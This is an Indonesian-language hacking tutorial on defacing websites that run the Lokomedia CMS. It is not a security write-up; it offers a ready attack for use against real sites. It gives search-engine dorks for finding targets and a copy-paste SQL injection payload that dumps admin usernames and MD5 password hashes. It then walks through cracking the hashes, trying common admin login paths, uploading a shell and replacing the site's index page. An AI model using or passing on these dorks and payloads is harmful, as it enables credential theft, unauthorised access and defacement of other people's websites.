Deface Metode SQL Lokomedia

Website-website Indonesia kebanyakan memakai CMS Lokomedia, jadi teknik atau poc SQL Lokomedia adalah metode yang tepat untuk tebas tu web :v, sebelumnya, ada beberapa alat dan bahan yang perlu kalian siapkan, diantaranya.
Dork ( pastinya asu)
Script Deface (Wajib)
MD5 Decrypter
Koneksi Internet (Serah lu :v)
Kopi (Udud nya jangan lupa :v)

     
                       Deface Metode SQL Lokomedia

#1. Silahkan dorking dengan search engine, gunakan saja chrome agar lebih fast, untuk dorknya bisa memakai dork dibawah ini.
●inurl:statis-1-pengantar.html
●inurl:statis-1/profil.html
●inurl:statis-19-beasiswa.html
●inurl:statis-22-kerjasama.html
●inurl:kategori-23-hiburan.html
●inurl:/statis-3-profil.html
●inurl:statis-2/visi-dan-misi.html
      Kembangin Lagi Agar Vuln

#2. Setelah itu, kalian akan masuk ke halaman statis pada website tersebut. Silahkan kalian masukan Exploit pada link halaman tersebut, untuk Exploitnya, Bisa Copas ni Cuk

"'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+

Jika kalian masukan Exploit tersebut pada link websitenya, akan terlihat kaya gini ni

http://site.com/statis-'union+select+make_set(6,@:=0x0a,(select(1)from(users)where@:=make_set(511,@,0x3C6C693E,username,password)),@)--+1-profil.html

#3. Selanjutnya, akan terlihat sudah username dan password pada "Title" webite itu

#4. Agar akun login website terlihat semua, kalian "View Source" saja atau bisa menekan tombol "CTRL +U" pada perangkat kalian. Cari bagian <title>. Lalu ada username dan passwordnya, tetapi passwordnya masih berbentuk sebuah kode. Kode tersebut akan kita decryptkan

#5. Copy passwordnya yang berupa kode tersebut, dan pastekan pada MD5 Decrypter di HashKiller Decrypter. Masukan passwordnya, lalu masukan captcha, dan terakhir submit, dan lihat hasil passwordnya pada bagian sebelah kanan.

#6. Selanjutnya, login admin pada website tersebut, untuk loginnya kalian bisa menggunakan beberapa permalink dibawah ini.
http://site.com/admin
http://site.com/adminweb
http://site.com/administrator
http://site.com/redaktur
http://site.com/cp-admin
http://site.com/panel


Pilih salah satu halaman login tersebut, jika tidak bisa, cari yang lain, dan jika tidak dapat juga, kalian bisa memakai aplikasi "Admin Login Finder".


#7. Setelah berhasil kalian masuk kedalam halaman admin pada website tersebut, kalian bisa mengakses direktori dan upload shell dan kalian bisa langsung tuntaskan menebas index.